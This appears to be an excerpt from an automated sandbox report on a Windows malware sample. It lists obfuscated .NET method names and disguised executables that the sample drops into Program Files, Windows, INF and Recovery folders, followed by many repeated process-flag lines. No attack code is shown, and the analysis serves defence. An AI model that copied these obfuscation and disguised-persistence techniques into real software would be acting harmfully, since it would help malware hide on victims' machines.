                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, BoBUuSebhyUJRedHPla.csHigh entropy of concatenated method names: 'YBaCL7kBOCEAN6Jd7EMJ', 'wLfI2GkBViOWbjaienSd', 'hjAb2TkBXw4AYWlbKOcq', 'LQN6FikBNuG1Zgb0R8Rg', 'MWDEQivN5a', 'CEcDZakBUlXtpj6nPlrr', 'q4bMoHkBx8fJRyS5oauL', 'FYcU2gkBBFOWwWuAjZuW', 'DtqBwqkB5aPEyhWFKhUV', 'bAwIEqkBmmRf9OP5TSME'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, AvoTdUrfxxyY7sd61mu.csHigh entropy of concatenated method names: 'iiDLp37miX', 'Sb5LkNHuY9', 'pSgL8PdIFY', 'vBALGdwiXi', 'qKxL2N3qef', 'UtUK3SkNqwaUFAbGmqQs', 'gt0iyQkNyMsptHruG0dF', 'xrPnmCkNJVq9llP4Xb42', 'cHTguEkNoEqJAwDbuwha', 'HF5lH1kNHRuYILaT28DR'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, dWjKsOZieIqqsU4xFwU.csHigh entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, pnHVjbCYmD4kSpDeZb6.csHigh entropy of concatenated method names: 'tvVCW7yI3Y', 'rtrC1McxtT', 'wLUCuULKyj', 'fqDCvMDjep', 'uZ8CM6Lwxf', 'KU4QmIkOxy4Bvbr6i1dM', 'Dq5vwpkONbtgkKZxehYL', 'LCK72KkOIVCc4ea3fSqm', 'nCyBTTkOB5YX9VJVTlgY', 'K8I1GRkOUFxeLJXDf3Ge'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, tFJ2ZYrARmC53dqdM0b.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'upKrlKhJaw', '_947', 'tXGrh6p9iM', 'eoFrEsOZtx', '_1f8', '_71D'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, cwhXhM8yhd1X7huhsEL.csHigh entropy of concatenated method names: 'Huy8oQvOAD', 'Kg48H8pcV4', 'bHb80gMFjw', 'a4VOhBknUT56eN6JQIV0', 'bufCONkn5HnBbeLsV72o', 'XyEKOgknm1LDAqwvyO2C', 'fKXOKmknSeqd9HqMtlcT', 'e8S8dUkndHfDTqh0BaqC', 'PZcPGdknjLbBpEGOAW8K', 'vQvML6kn78qgQb1FKlIg'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, jIVF2XjuUTSTbjVWYVy.csHigh entropy of concatenated method names: 'IdX70mOabb', 'XEE2tbk1e1KhHrTqUlkE', 'kKeXHOk1P3Xg6bXyJGkW', 'IRNJtdk1LC6C1Wdah7TF', 'Nfn3O5k190CQRbqMR2dy', 'EZGe8pk1AhdtPjgFTxEB', 'CPX', 'h7V', 'G6s', '_2r8'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, UAhFZSiV04MSVPQJUpr.csHigh entropy of concatenated method names: 'ngPiOOkI53', 'XdNiNN5suu', 'wSOiIES5D0', 'G9bixBKpAL', 'RqEiBgkuEQ', 'VxquKckdQ6fGLMvgDEnT', 'cReZ0mkdDvp1qVwJbjsp', 'VJWTlYkdKeAGiusYZbVl', 'EGqIFhkd6N1wNsoUF0W5', 'd4xKQXkdtZWhYvYs82Yl'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, uFG2SYJF7LoJcbj3jVP.csHigh entropy of concatenated method names: 'mPGJNmhZUj', 'ooBFtUkRHHnsGiePnMY3', 'w3cu7ekRJ79vQtnEjP9M', 'msAWSVkRooluTdvHS93K', 'etW08JkR0jjHBe35hFXM', 'j1PvNYkRZoXD5OqEaAJk', 'UU8', 'd65', 'ufOk2CBbX0E', 'K8bk2rwEn2C'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, IFkZCCGSvkwuD5n9KJt.csHigh entropy of concatenated method names: 'K6XGYQKmhm', 'RWydSckistDB6yL8Qia4', 'w1kUbBkiiQ6rdbBUX1BG', 'Kscr8ukiFHZkB8uJ13HB', 'hjGCxlkictbytl9KL0o7', 'ISyGj6VcZA', 'WkrMlbkiDTedHWjgUSCN', 'CqXoyrkitRyJj3uShyO6', 's3wrEcki6bdvOv3JicST', 'BLvWpvkiQjQhvD66RpTu'
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe File created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
